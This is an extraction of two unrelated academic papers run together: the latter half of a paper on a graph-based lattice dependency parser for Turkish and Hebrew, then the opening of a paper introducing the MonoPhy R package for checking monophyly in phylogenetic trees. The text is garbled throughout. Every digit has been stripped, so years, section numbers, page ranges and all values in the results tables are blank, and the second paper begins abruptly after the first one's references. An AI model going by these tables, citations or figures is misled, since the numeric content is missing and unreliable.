disambiguated by running a morphological disam- biguator. we train our own disambiguator using the bigram model from the parser and find the best path through the lattice with the viterbi algorithm. the disambiguator uses the same bigram features as the lattice parser. the morphological disambiguator is trained on the turkish treebank as in çetinoğlu ( ). . the hebrew data the data for hebrew comes from the spmrl shared task (seddah et al., ), which is based on the treebank for modern hebrew (sima’an et al., ). it provides lattices and predisam- biguated input files. the training and development lattices contained a number of circular structures due to self-loops in some states. we automatically re- moved the transitions causing these cycles. input lattices for training were prepared as for turkish by adding the gold standard paths if nec- essary. compared to the turkish data, the hebrew lattices are so large that training times for the lat- tice parser became unacceptable. we therefore used our morphological disambiguator to predict the best paths for each lattice. all transitions in the lat- tice that were not part of one of these paths were discarded. note that the number of actual paths in these pruned lattices is much higher than , since the paths converge after each word. all experiments the corrected version is available on the second author’s webpage. with the joint model for hebrew are conducted on the pruned lattices. as for turkish we preprocess the input lattices for all baselines with our own mor- phological disambiguator. . baselines we compare the lattice parser (joint for turkish, joint for hebrew) to three baselines: mate, turbo, and pipeline. the first two baseline systems are off-the-shelf dependency parsers that currently represent the state-of-the-art. mate parser (bohnet, ; bohnet, ) is a graph-based dependency parser that uses carreras’ decoder (carreras, ) and ap- proximate search (mcdonald and pereira, ) to produce non-projective dependency structures. tur- boparser (martins et al., ) is a graph-based parser that uses a dual decomposition approach and outputs non-projective structures natively. the third baseline system runs the lattice parser on a pre- disambiguated lattice, i.e. in a pipeline setup. all three baselines are pipeline setups and use the same disambiguator to predict a path through the lat- tice. the bigram features in the disambiguator are the same as in the joint model. there is thus no dif- ference between the lattice parser and the baselines with respect to the features that are available during segmentation. as opposed to lattice parsing, base- line systems are trained on the gold standard seg- mentation (and thus gold morphological analyses) in the training data, since automatically predicted paths would not guarantee to be compatible with the gold dependency structures. the purpose of the first two baselines is to com- pare the joint parser to the current state-of-the-art. however, the feature sets are different between the joint parser and the off-the-shelf baselines. a differ- ence in performance between the joint parser and the first two baseline systems may thus simply be caused by a difference in the feature set. the third baseline eliminates this difference in the feature sets since it is the actual lattice parser that is run on a disam- biguated lattice. because the morphological disam- biguator for the pipeline baseline is using the same feature set as the lattice parser (the bigram model), http://code.google.com/p/mate-tools http://www.ark.cs.cmu.edu/turboparser/, version . . the fact that the joint parser is trained and tested on full lattices is the only difference between these two systems. the pipeline baseline thus allows us to test directly the effect of joint decoding compared to a pipeline setup. . evaluation standard labeled and unlabeled attachment scores are not applicable when parsing with uncertain seg- mentation since the number of tokens in the output of the parser may not coincide with the number of tokens in the gold standard. previous work therefore suggests alternative methods for evaluation, e.g. by means of precision, recall, and f-score over tokens, see e.g. tsarfaty ( ) or cohen and smith ( ). the uncertainty of segmentation furthermore makes it very hard to evaluate the other levels of analysis independently of the segmentation. in or- der to decide whether the morphological analysis of a token (or its syntactic attachment) is correct, one always needs to find out first to which token in the gold standard it corresponds. by establishing this correspondence, the segmentation is already being evaluated. evaluating syntax isolated from the other levels of analysis is therefore not possible in general. hatori et al. ( ) count a dependency relation correct only when both the head and the dependent have the correct morphological analysis (here pos) and segmentation. goldberg ( , page ) pro- poses a similar approach, but only requires surface forms to match between gold standard and predic- tion. these metrics compute precision and recall over tokens. eryiğit et al. ( ) and eryiğit ( ) define an accuracy (igeval) for turkish parsing by taking advantage of the annotation scheme in the turkish treebank: a non-final ig in the turkish tree- bank always has its head immediately to the right, al- ways with the same label, which makes it possible to ignore the inner dependency relations, i.e. the seg- mentation, of a dependent word. the metric there- fore only needs to check for each word whether the head of the last ig is attached to the correct ig in another word. the metric includes a back-off strat- egy in case the head word’s segmentation is wrong. a dependency arc is then counted as correct if it at- taches to an ig in the correct word and the pos tag of the head ig is the same as in the gold standard. parsing evaluation. we follow hatori et al. ( ) and use a strict definition of precision and recall (prec, rec, f ) over tokens to evaluate the full task. we first align the tokens of a word in the parser output with the tokens of the correspond- ing word in the gold standard using the needleman- wunsch algorithm (needleman and wunsch, ), which we modify so it does not allow for mis- matches. a token in the parser output that is not in the gold standard is thus paired with a gap and vice versa. two tokens must have the same morphologi- cal analysis in order to match. a true positive is defined as a pair of matching to- kens whose heads are also aligned and match. for labeled scores, the dependency relations must match as well. precision is defined as the number of true positives over the number of tokens in the predic- tion, recall is defined as the number of true posi- tives over the number of tokens in the gold standard. f-score is the harmonic mean of precision and recall. this metric is very strict and requires all levels of analysis to be correct. in order to evaluate the syntax as independently as possible, we furthermore report igeval for turkish, with and without the aforemen- tioned backoff strategy (igeval and igeval strict). for hebrew, we report on a version of precision and recall as defined above that only requires the surface forms of the tokens to match. this metric is almost the one proposed in goldberg ( ). all reported evaluation metrics ignore punctuation. we do not use tedeval as defined in tsarfaty et al. ( ) even though it has been used previ- ously to evaluate dependency parsing with uncer- tain segmentation (seddah et al., ; zhang et al., ). the reason is that it is not an inher- ently dependency-based framework and the con- version from constituency structures to dependency structures interferes with the metric. the metric the method does not create cross, many-to-one, or one-to- many alignments, which can be important because in very rare cases the same token occurs twice in one word. the metric would not work for turkish, as the surface forms of non-final igs are all represented as underscores. as an experiment, we took a turkish treebank tree and cre- ated artificial parses by attaching one token to a different head each time. all other tokens remained attached to their correct head, and segmentation is kept gold. this gave us parses that contained exactly one attachment error and one parse iden- tical with the gold standard. running tedeval on each of the proposed in goldberg ( ) implements the same ideas without edit distance and is defined directly for dependencies. segmentation evaluation. we use the same token-based precision and recall to measure the quality of segmentation and morphological analysis without syntax. for a token to be correct, it has to have the same morphological analysis as the token in the gold standard to which it is aligned. we fur- thermore report word accuracy (accw), which is the percentage of words that received the correct seg- mentation. results segmentation and morphology. table shows the quality of segmentation and morphological anal- ysis. the baseline for turkish is the turkish morphological disambiguator by sak et al. ( ), trained on the turkish treebank. for hebrew, the baseline is the disambiguated lattices provided by the spmrl shared task. the bigram model is our own morphological disambiguator. the joint model is the full lattice parser, which has access to syntactic information. the results show that the bigram model is clearly outperforming the baselines for both languages. the feature model of the bigram model was developed on the turkish development set, but the model also works well for hebrew. comparing the bigram model to the joint model shows that overall, the joint model performs better than the bigram model. how- ever, the joint model mainly scores in recall rather than in precision, the bigram model is even ahead of the joint model in precision for hebrew. the joint model outperforms the bigram model and the base- line also in word accuracy. the results demonstrate that syntactic information is relevant to resolve am- biguity in segmentation and morphology for turkish and hebrew. incorrect parses gave us different scores. the differences are caused by the transformation of dependency trees to con- stituency trees, because the constituency trees have different edit distances compared to the gold standard. consequently, this means that some attachment errors of the dependency parser are punished more than others in an unpredictable way. a description on how these lattice are produced is given in seddah et al. ( , page ) turkish hebrew data system prec rec f accw prec rec f accw dev baseline . . . . . . . . bigram model . . . . . . . . joint model . . . . . . . . test baseline . . . . . . . . bigram model . . . . . . . . joint model . . . . . . . . table : path selection quality. labeled unlabeled igeval strict igeval data system prec rec f prec rec f uasig lasig uasig lasig dev mate . . . . . . . . . . turbo . . . . . . . . . . pipeline . . . . . . . . . . joint . . ∗ . . . ∗ . . ∗ . . . cv mate . . . . . . . . . . turbo . . . . . . . . . . pipeline . . . . . . . . . . joint . . † . . ∗ . † . . . . . test mate . . . . . . . . . . turbo . . . . . . . . . . pipeline . . . . . . . . . . joint . . ∗ . . ∗ . ∗ . . . . . table : parsing results for turkish. statistically significant differences between the joint system and the pipeline system are marked with † (p < . ) and ∗ (p < . ). significance testing was performed using the wilcoxon signed rank test (not for f ). turkish. table presents the results of the eval- uation of the three baseline systems and the lattice parser on the turkish data. the pipeline and the joint system give better results than the other two baselines across the board. this shows that the fea- ture set of the lattice parser is better suited to the turkish treebank than the feature set of mate parser and turbo parser. it is not a surprising result though, since the lattice parser was developed for turkish whereas the other two parsers were developed for other treebanks. the joint system outperforms the pipeline sys- tem with respect to the first three metrics. these metrics evaluate syntax, segmentation, and morpho- logical analysis jointly. higher scores here mean that these aspects in combination have become bet- ter. the differences between the pipeline and the joint model are consistently statistically significant with respect to recall, but only in some cases with re- spect to precision. the syntactic information that is available to the joint model thus seems to improve recall rather than precision. the last two columns in table show an evalu- ation using igeval. the igeval metric is designed to evaluate the syntactic quality with less attention to morphological analysis and segmentation. here, both pipeline and joint achieve very similar re- sults and none of the differences is statistical signif- icant. these results suggest that a good part of the improvements in the lattice parser occurs in the mor- phological analysis/segmentation, whereas the qual- ity of syntactic annotation basically stays the same between the pipeline and the joint model. hebrew. the experimental results on the hebrew data are shown in table . the three baselines per- form very similarly. all three baseline systems are run on the output of the same disambiguator, which means that the feature models of the parsers seem to be equally well suited to the hebrew treebank. the feature model of the lattice parser that is used in the pipeline baseline was not adapted to hebrew in any way, but was used as it was developed for the turk- ish data. compared to the three baselines, the joint model outperforms them for both labeled and unlabeled scores. as the only difference between pipeline and joint is the fact that the latter performs joint decoding, the results support the findings in con- stituency parsing by tsarfaty ( ), cohen and smith ( ), and goldberg and tsarfaty ( ), namely that joint decoding is a better model for he- brew parsing. judging from statistical significance, the joint model improves recall rather than preci- sion, a picture that we found for turkish as well. labeled unlabeled data system prec rec f prec rec f dev mate . . . . . . turbo . . . . . . pipeline . . . . . . joint . . † . . . ∗ . test mate . . . . . . turbo . . . . . . pipeline . . . . . . joint . . † . . . † . table : statistically significant differences between the joint system and the pipeline system are marked with † (p < . ) and ∗ (p < . ). significance testing was performed using the wilcoxon signed rank test (not for f ). as described in section . , we cannot evaluate the syntax entirely independently on hebrew, but we can eliminate the morphological level. table shows the results of the evaluation when only syn- tax and surface forms are matched. the overall pic- ture compared to the evaluation shown in table does not change, however. also when disregarding the quality of morphology, the joint model outper- forms the pipeline, notably with respect to recall. related work graph-based parsing. our basic architecture re- sembles the joint constituency parsing and pos tag- ging model by rush et al. ( ), but our model labeled unlabeled data system prec rec f prec rec f dev mate . . . . . . turbo . . . . . . pipeline . . . . . . joint . . † . . . † . test mate . . . . . . turbo . . . . . . pipeline . . . . . . joint . . † . . . † . table : parsing results for hebrew, evaluated without morphology. statistically significant differences between the joint system and the pipeline system are marked with †. significance testing was performed using the wilcoxon signed rank test with p < . (not for f ). needs additional constraints to enforce agreement between the two tasks. martins et al. ( a) and martins et al. ( ) show how such first-order logic constraints can be represented as subproblems in dual decomposition. similar approaches, where such constraints are used to ensure certain proper- ties in the output structures, have been used e.g. in semantic parsing (das et al., ), compressive summarization (almeida and martins, ), and joint quotation attribution and coreference resolu- tion (almeida et al., ). parsers that use dual de- composition are proposed in koo et al. ( ) and martins et al. ( ). from koo et al. ( ), we adopted the idea of using the chu-liu-edmonds al- gorithm to ensure tree properties in the output as well as second-order parsing with head automata. li et al. ( ) extend several higher-order vari- ants of the eisner decoder (eisner, ) such that pos tags are predicted jointly with syntax. the complexity of their joint models increases by poly- nomials of the tag set size. due to the dual decompo- sition approach, the complexity of our parser stays equal to the complexity of the most complex sub- problem, which is the second-order head automata in our case. transition-based parsing. joint models in transition-based parsing usually introduce a variant of the shift transition that performs the additional task, e.g. it additionally predicts the pos tag and possibly morphological features of a token that is being shifted (hatori et al., ; bohnet and nivre, ; bohnet et al., ). optimization over the joint model is achieved by beam search. to also solve the word segmentation task, several models for chinese were proposed that parse on the level of single characters, forming words from characters with a special append transition (hatori et al., ; li and zhou, ) or predicting word internal structure along with syntax (zhang et al., ). to use such a transition-based system for the segmen- tation task in turkish or hebrew, the shift transition would have to be changed to do the opposite of the append transition in the chinese parsers: segment an incoming token into several ones, for example based on the output of a morphological analyzer. easy-first parsing. ma et al. ( ) introduce a variant of the easy-first parser (goldberg and el- hadad, a) that uses an additional operation to pos tag input tokens. the operations are ordered such that the parser can only introduce a dependency arc between two tokens that have received a pos tag already. tratz ( ) presents a similar system for arabic that defines several more operations to deal with segmentation ambiguity. sampling-based parsing. zhang et al. ( ) present a joint model that relies on sampling and greedy hill-climbing for decoding, but allows for ar- bitrarily complex scoring functions thus opening ac- cess to global and cross-level features. such fea- tures could be simulated in our model by adding ad- ditional factors in the form of soft constraints (con- straints with output, see martins et al. ( )), but this would introduce a considerable number of addi- tional factors with a notable impact on performance. constituency parsing. joint models have also been investigated in constituency parsing, notably for hebrew. tsarfaty ( ) already discusses full joint models, but the first full parsers were presented in cohen and smith ( ), goldberg and tsar- faty ( ), and later goldberg and elhadad ( ). green and manning ( ) present a similar parser for arabic. among these, some authors emphasize the importance of including scores from the mor- phological model into the parsing model, whereas other models do not use them at all. in our parser, the model is trained jointly for both tasks without weighting the two tasks differently. parsing hebrew and turkish. joint models for hebrew parsing were mostly investigated for con- stituency parsing (see above). there has been some work specifically on hebrew dependency parsing (goldberg and elhadad, ; goldberg and el- hadad, b; goldberg, ), but not in the con- text of joint models. turkish dependency parsing was pioneered in eryiğit and oflazer ( ) and eryiğit et al. ( ). they compare parsing based on inflectional groups to word-based parsing and conclude that the former is more suitable for turkish. çetinoğlu and kuhn ( ) are first to discuss joint models for turkish and present experiments for joint pos tagging and parsing, but use a pipeline to decide on segmenta- tion and morphological features. to the best of our knowledge, there currently exists no work on full lat- tice parsing for turkish. conclusion morphologically rich languages pose many chal- lenges to standard dependency parsing systems, one of them being that the number of tokens in the output is not always known beforehand. solving this prob- lem in a pipeline setup leads to efficient systems but systematically excludes interaction between the lex- ical, morphological, and syntactic level of analysis. in this work, we have presented a graph-based lattice dependency parser that operates on morpho- logical lattices and simultaneously predicts a de- pendency tree and a path through the lattice. we tested the joint model on the turkish treebank and the treebank of modern hebrew and demonstrated that the joint model outperforms three state-of-the- art pipeline models. we presented the first results for full lattice parsing on the turkish treebank. the results on the hebrew treebank corroborate findings in constituency parsing (cohen and smith, ; goldberg and tsarfaty, ). acknowledgments we thank our anonymous reviewers for their help- ful comments. we also thank anders björkelund for many useful discussions. this work was funded by the deutsche forschungsgemeinschaft (dfg) via sfb , projects d and d . references miguel almeida and andre martins. . fast and robust compressive summarization with dual de- composition and multi-task learning. in proceed- ings of the st annual meeting of the association for computational linguistics (volume : long papers), pages – , sofia, bulgaria, august. association for computational linguistics. mariana s. c. almeida, miguel b. almeida, and andré f. t. martins. . a joint model for quotation at- tribution and coreference resolution. in proceedings of the th conference of the european chapter of the association for computational linguistics, pages – , gothenburg, sweden, april. association for com- putational linguistics. bernd bohnet and joakim nivre. . a transition- based system for joint part-of-speech tagging and labeled non-projective dependency parsing. in pro- ceedings of the joint conference on empirical methods in natural language processing and com- putational natural language learning, pages – , jeju, south korea. association for computa- tional linguistics. bernd bohnet, joakim nivre, igor boguslavsky, richrd farkas, filip ginter, and jan haji. . joint mor- phological and syntactic analysis for richly inflected languages. transactions of the association for com- putational linguistics, : – . bernd bohnet. . efficient parsing of syntactic and semantic dependency structures. in proceedings of the thirteenth conference on computational natu- ral language learning (conll ): shared task, pages – , boulder, colorado, june. association for computational linguistics. bernd bohnet. . very high accuracy and fast depen- dency parsing is not a contradiction. in proceedings of the rd international conference on computational linguistics, pages – , beijing, china. international committee on computational linguistics. xavier carreras. . experiments with a higher- order projective dependency parser. in proceedings of the conll shared task session of emnlp-conll , pages – , prague, czech republic, june. association for computational linguistics. özlem çetinoğlu and jonas kuhn. . towards joint morphological analysis and dependency pars- ing of turkish. in proceedings of the second in- ternational conference on dependency linguistics (depling ), pages – , prague, czech repub- lic, august. charles university in prague, matfyz- press, prague, czech republic. özlem çetinoğlu. . turkish treebank as a gold standard for morphological disambiguation and its influence on parsing. in nicoletta calzolari (confer- ence chair), khalid choukri, thierry declerck, hrafn loftsson, bente maegaard, joseph mariani, asun- cion moreno, jan odijk, and stelios piperidis, editors, proceedings of the ninth international conference on language resources and evaluation (lrec’ ), reykjavik, iceland, may. european language re- sources association (elra). yoeng-jin chu and tseng-hong liu. . on the shortest arborescence of a directed graph. scientia sinica, ( ): – . shay b. cohen and noah a. smith. . joint morpho- logical and syntactic disambiguation. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – , prague, czech republic. association for computational lin- guistics. koby crammer, ofer dekel, shai shalev-shwartz, and yoram singer. . online passive-aggressive algo- rithms. in proceedings of the th annual conference on neural information processing systems, volume , pages – , cambridge, massachusetts, usa. mit press. dipanjan das, andré f. t. martins, and noah a. smith. . an exact dual decomposition algorithm for shallow semantic parsing with constraints. in *sem : the first joint conference on lexical and com- putational semantics – volume : proceedings of the main conference and the shared task, and volume : proceedings of the sixth international workshop on semantic evaluation (semeval ), pages – , montréal, canada, - june. association for compu- tational linguistics. jack edmonds. . optimum branchings. jour- nal of research of the national bureau of standards, b( ): – . jason eisner. . bilexical grammars and a cubic- time probabilistic parser. in proceedings of the th international workshop on parsing technologies (iwpt), pages – , mit, cambridge, ma, sep. gülşen eryiğit and kemal oflazer. . statistical de- pendency parsing of turkish. in proceedings of the th conference of the european chapter of the as- sociation for computational linguistics, pages – , trento, italy. association for computational linguis- tics. gülşen eryiğit, joakim nivre, and kemal oflazer. . dependency parsing of turkish. computational lin- guistics, ( ): – . gülşen eryiğit, tugay ilbay, and ozan arkan can. . multiword expressions in statistical depen- dency parsing. in proc. of the spmrl workshop of iwpt, pages – , dublin, ireland. gülşen eryiğit. . the impact of automatic morpho- logical analysis & disambiguation on dependency parsing of turkish. in nicoletta calzolari, khalid choukri, thierry declerck, mehmet uğur doğan, bente maegaard, joseph mariani, jan odijk, and ste- lios piperidis, editors, proceedings of the eighth in- ternational conference on language resources and evaluation (lrec- ), pages – , istanbul, turkey, may. european language resources associa- tion (elra). acl anthology identifier: l - . yoav freund and robert e. schapire. . large mar- gin classification using the perceptron algorithm. ma- chine learning, ( ): – . yoav goldberg and michael elhadad. . hebrew dependency parsing: initial results. in proceedings of the th international conference on parsing tech- nologies (iwpt’ ), pages – , paris, france, october. association for computational linguistics. yoav goldberg and michael elhadad. a. an ef- ficient algorithm for easy-first non-directional de- pendency parsing. in human language technologies: the annual conference of the north american chapter of the association for computational linguis- tics, pages – , los angeles, california, june. association for computational linguistics. yoav goldberg and michael elhadad. b. easy-first dependency parsing of modern hebrew. in proceed- ings of the naacl hlt first workshop on sta- tistical parsing of morphologically-rich languages, pages – , los angeles, ca, usa, june. associ- ation for computational linguistics. yoav goldberg and michael elhadad. . word seg- mentation, unknown-word resolution, and morpholog- ical agreement in a hebrew parsing system. computa- tional linguistics, ( ): – . yoav goldberg and reut tsarfaty. . a single gener- ative model for joint morphological segmentation and syntactic parsing. in proceedings of the th annual meeting of the association for computational linguis- tics, pages – , columbus, ohio. association for computational linguistics. yoav goldberg. . automatic syntactic processing of modern hebrew. ph.d. thesis, ben gurion university, beer sheva, israel. spence green and christopher d. manning. . bet- ter arabic parsing: baselines, evaluations, and anal- ysis. in proceedings of the rd international con- ference on computational linguistics (coling ), pages – , beijing, china, august. coling organizing committee. jun hatori, takuya matsuzaki, yusuke miyao, and jun’ichi tsujii. . incremental joint pos tag- ging and dependency parsing in chinese. in proceed- ings of th international joint conference on natu- ral language processing, pages – , chiang mai, thailand, november. asian federation of natu- ral language processing. jun hatori, takuya matsuzaki, yusuke miyao, and jun’ichi tsujii. . incremental joint approach to word segmentation, pos tagging, and dependency parsing in chinese. in proceedings of the th an- nual meeting of the association for computational linguistics (volume : long papers), pages – , jeju island, korea, july. association for com- putational linguistics. terry koo, alexander m. rush, michael collins, tommi jaakkola, and david sontag. . dual decomposi- tion for parsing with non-projective head automata. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , cambridge, ma, october. association for computational linguistics. zhongguo li and guodong zhou. . unified depen- dency parsing of chinese morphological and syntactic structures. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing, pages – , jeju island, korea, july. asso- ciation for computational linguistics. zhenghua li, min zhang, wanxiang che, ting liu, wen- liang chen, and haizhou li. . joint models for chinese pos tagging and dependency parsing. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , edinburgh, scotland, uk, july. associa- tion for computational linguistics. ji ma, tong xiao, jingbo zhu, and feiliang ren. . easy-first chinese pos tagging and dependency parsing. in proceedings of coling , pages – , mumbai, india, december. the coling organizing committee. andre martins, noah smith, and eric xing. . con- cise integer linear programming formulations for de- pendency parsing. in proceedings of the joint con- ference of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp, pages – , sun- tec, singapore, august. association for computational linguistics. andre martins, noah smith, eric xing, pedro aguiar, and mario figueiredo. . turbo parsers: depen- dency parsing by approximate variational inference. in proceedings of the conference on empirical methods in natural language processing, pages – , cambridge, ma, october. association for compu- tational linguistics. andre martins, mario figueiredo, pedro aguiar, noah smith, and eric xing. a. an augmented la- grangian approach to constrained map inference. in lise getoor and tobias scheffer, editors, proceed- ings of the th international conference on machine learning (icml- ), icml ’ , pages – , new york, ny, usa, june. acm. andre martins, noah smith, mario figueiredo, and pe- dro aguiar. b. dual decomposition with many overlapping components. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , edinburgh, scot- land, uk., july. association for computational lin- guistics. andre martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non- projective turbo parsers. in proceedings of the st annual meeting of the association for computational linguistics (volume : short papers), pages – , sofia, bulgaria, august. association for computa- tional linguistics. andré f. t. martins, mário a. t. figueiredo, pedro m. q. aguiar, noah a. smith, and eric p. xing. . ad : alternating directions dual decomposition for map inference in graphical models. journal of machine learning research, : – . ryan mcdonald and fernando pereira. . on- line learning of approximate dependency parsing al- gorithms. in proceedings of the th conference of the european chapter of the association for compu- tational linguistics, pages – , trento, italy. asso- ciation for computational linguistics. ryan mcdonald, fernando pereira, kiril ribarov, and jan hajic. . non-projective dependency parsing using spanning tree algorithms. in proceedings of human language technology conference and confer- ence on empirical methods in natural language pro- cessing, pages – , vancouver, british columbia, canada, october. association for computational lin- guistics. saul b. needleman and christian d. wunsch. . a general method applicable to the search for similarities in the amino acid sequence of two proteins. journal of molecular biology, ( ): – . kemal oflazer, bilge say, dilek zeynep hakkani-tür, and gökhan tür. . building a turkish tree- bank. in anne abeille, editor, building and exploiting syntactically-annotated corpora. kluwer academic publishers, dordrecht. kemal oflazer. . two-level description of turk- ish morphology. literary and linguistic computing, ( ): – . alexander m. rush, david sontag, michael collins, and tommi jaakkola. . on dual decomposition and linear programming relaxations for natural lan- guage processing. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – , cambridge, ma, october. asso- ciation for computational linguistics. haşim sak, tunga güngör, and murat saraçlar. . turkish language resources: morphological parser, morphological disambiguator and web corpus. in proc. of gotal , pages – . djamé seddah, reut tsarfaty, sandra kübler, marie can- dito, jinho d. choi, richárd farkas, jennifer fos- ter, iakes goenaga, koldo gojenola galletebeitia, yoav goldberg, spence green, nizar habash, marco kuhlmann, wolfgang maier, joakim nivre, adam przepiórkowski, ryan roth, wolfgang seeker, yan- nick versley, veronika vincze, marcin woliński, alina wróblewska, and eric villemonte de la clergerie. . overview of the spmrl shared task: a cross-framework evaluation of parsing morphologi- cally rich languages. in proceedings of the fourth workshop on statistical parsing of morphologically- rich languages, pages – , seattle, washington, usa, october. association for computational lin- guistics. djamé seddah, sandra kübler, and reut tsarfaty. . introducing the spmrl shared task on parsing morphologically-rich languages. in proceedings of the first joint workshop on statistical parsing of mor- phologically rich languages and syntactic analysis of non-canonical languages, pages – , dublin, ireland, august. dublin city university. khalil sima’an, alon itai, yoad winter, alon altman, and noa nativ. . building a tree-bank of modern hebrew text. traitement automatique des langues, ( ): – . ben taskar, vassil chatalbashev, daphne koller, and carlos guestrin. . learning structured predic- tion models: a large margin approach. in proceed- ings of the th annual international conference on machine learning, pages – , bonn, germany. acm. stephen tratz. . a cross-task flexible transi- tion model for arabic tokenization, affix detection, affix labeling, pos tagging, and dependency pars- ing. in proceedings of the fourth workshop on sta- tistical parsing of morphologically-rich languages, pages – , seattle, washington, usa, october. as- sociation for computational linguistics. reut tsarfaty, djamé seddah, yoav goldberg, sandra kuebler, yannick versley, marie candito, jennifer foster, ines rehbein, and lamia tounsi. . sta- tistical parsing of morphologically rich languages (spmrl) what, how and whither. in proceedings of the naacl hlt first workshop on statistical parsing of morphologically-rich languages, pages – , los angeles, ca, usa, june. association for computational linguistics. reut tsarfaty, joakim nivre, and evelina andersson. . joint evaluation of morphological segmen- tation and syntactic parsing. in proceedings of the th annual meeting of the association for compu- tational linguistics (volume : short papers), pages – , jeju island, korea, july. association for com- putational linguistics. reut tsarfaty. . integrated morphological and syn- tactic disambiguation for modern hebrew. in pro- ceedings of the coling/acl student research workshop, pages – , sydney, australia, july. as- sociation for computational linguistics. meishan zhang, yue zhang, wanxiang che, and ting liu. . character-level chinese dependency parsing. in proceedings of the nd annual meeting of the association for computational linguistics (vol- ume : long papers), pages – , baltimore, maryland, june. association for computational lin- guistics. yuan zhang, chengtao li, regina barzilay, and kareem darwish. . randomized greedy inference for joint segmentation, pos tagging and dependency parsing. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – , denver, colorado, may–june. association for computational linguistics. submitted december accepted march published march corresponding author orlando schwery, oschwery@vols.utk.edu academic editor mihai pop additional information and declarations can be found on page doi . /peerj-cs. copyright schwery and o’meara distributed under creative commons cc-by . open access monophy: a simple r package to find and visualize monophyly issues orlando schwery and brian c. o’meara department of ecology and evolutionary biology, university of tennessee, knoxville, tn, usa abstract background. the monophyly of taxa is an important attribute of a phylogenetic tree. a lack of it may hint at shortcomings of either the tree or the current taxonomy, or can indicate cases of incomplete lineage sorting or horizontal gene transfer. whichever is the reason, a lack of monophyly can misguide subsequent analyses. while monophyly is conceptually simple, it is manually tedious and time consuming to assess on modern phylogenies of hundreds to thousands of species. results. the r package monophy allows assessment and exploration of monophyly of taxa in a phylogeny. it can assess the monophyly of genera using the phylogeny only, and with an additional input file any other desired higher order taxa or unranked groups can be checked as well. conclusion. summary tables, easily subsettable results and several visualization options allow quick and convenient exploration of monophyly issues, thus making monophy a valuable tool for any researcher working with phylogenies. subjects bioinformatics, computational biology keywords phylogeny, evolution, monophyly, r package, taxonomy, rogue taxa, tree conflict, horizontal gene transfer, incomplete lineage sorting introduction phylogenetic trees are undoubtedly crucial for most research in ecology or evolutionary biology. whether one is studying trait evolution (e.g., coddington, ; donoghue, ), diversification (e.g., gilinsky & good, ; hey, ), phylogeography (avise et al., ), or simply relatedness within a group (e.g., czelusniak et al., ; shochat & dessauer, ; sibley & ahlquist, ), bifurcating trees representing hierarchically nested relationships are central to the analysis. exactly because phylogenies are so fundamental to the inferences we make, we need tools that enable us to examine how reconstructed relationships compare with existing assumptions, particularly taxonomy. we have computational approaches to estimate confidence for parts of a phylogeny (felsenstein, ; larget & simon, ) or measuring distance between two phylogenies (robinson, ), but assessing agreement of a new phylogeny with existing taxonomy is often done manually. this does not scale to modern phylogenies of hundreds to thousands of taxa. modern taxonomy seeks to name clades: an ancestor and all of its descendants (the descendants thus form a monophyletic group). discrepancies between the new phylogenetic hypothesis and the current taxonomic classification may indicate that the phylogeny is wrong or poorly resolved. alternatively, a well-supported phylogeny that conflicts with currently recognized groups might suggest that the taxonomy should be reformed. to identify such discrepancies, one can simply how to cite this article schwery and o’meara ( ), monophy: a simple r package to find and visualize monophyly issues. peerj com- put. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:oschwery@vols.utk.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. assess whether the established taxa are monophyletic. a lack of group monophyly however, can also be an indicator for conflict between gene trees and the species tree, which may be a result of incomplete lineage sorting or horizontal gene transfer. in any case, monophyly issues in a phylogeny suggest a potential error that can affect downstream analysis and inference. for example, it will mislead ancestral trait or area reconstruction or introduce false signals when assigning unsampled diversity for diversification analyses (e.g., in diversitree (fitzjohn, ) or bamm (rabosky, )). in general, a lack of monophyly can blur patterns we might see in the data otherwise. as this problem is by no means new, approaches to solve it have been developed earlier, particularly for large scale sequencing projects in bacteria and archaea, for which taxonomic issues are notoriously challenging. the program grunt (dalevi et al., ) uses a tip to root walk approach to group, regroup, and name clades according to certain user defined criteria. the subsequently developed ‘taxonomy to tree’ approach (mcdonald et al., ) matches existing taxonomic levels onto newly generated trees, allowing classification of unidentified sequences and proposal of changes to the taxonomic nomenclature based on tree topology. finally, matsen & gallagher ( ) have developed algorithms that find mismatches between taxonomy and phylogeny using a convex subcoloring approach. the new tool presented here, the r package monophy, is a quick and user-friendly method for assessing monophyly of taxa in a given phylogeny. while the r package ape (paradis, claude & strimmer, ) already contains the helpful function is.monophyletic, which also enables testing for monophyly, the functionality of monophy is much broader. apart from assessing monophyly for all groups and focal taxonomic levels in a tree at once, monophy is also not limited to providing a simple ‘yes-or-no’ output, but rather enables the user to explore underlying causes of non-monophyly. in the following, we outline the structure and usage of the package and provide examples to demonstrate its functionality. for a more usage-focused and application-oriented treatment, one should refer to the tutorial vignette (vignette (‘‘monophyvignette’’)), which contains stepwise instructions for the different functions and their options. for any other package details, consult the documentation (help(‘‘monophy’’)). description the package monophy is written in r (r development core team, , http://www.r- project.org/), an increasingly important language for evolutionary biology. it builds on the existing packages ape (paradis, claude & strimmer, ), phytools (revell, ), phangorn (schliep, ), rcolorbrewer (neuwirth, ) and taxize (chamberlain & szocs, ). a list of the currently implemented commands is given in table . note that in the code and this paper, we distinguish between tips, the organisms at the tip of the tree, and higher order taxa. functions with ‘taxa’ only return information about higher order taxa, not tips. the main function—assessmonophyly—evaluates the monophyly of each higher order taxon by identifying the most recent common ancestor (mrca) of a collection of tips (e.g., all species in a genus), and then returning all descendants of this node. the taxon is monophyletic if the number of its members (tips) equals the number of schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.r-project.org/ http://www.r-project.org/ http://dx.doi.org/ . /peerj-cs. table functions of the package monophy. function name description assessmonophyly runs the main analysis to assess monophyly of groups on a tree. getancnodes returns mrca nodes for taxa. getintrudertaxa returns lists of taxa that cause monophyly issues for another taxon. getintrudertips returns lists of tips that cause monophyly issues for a taxon. getoutliertaxa returns lists of taxa that have monophyly issues 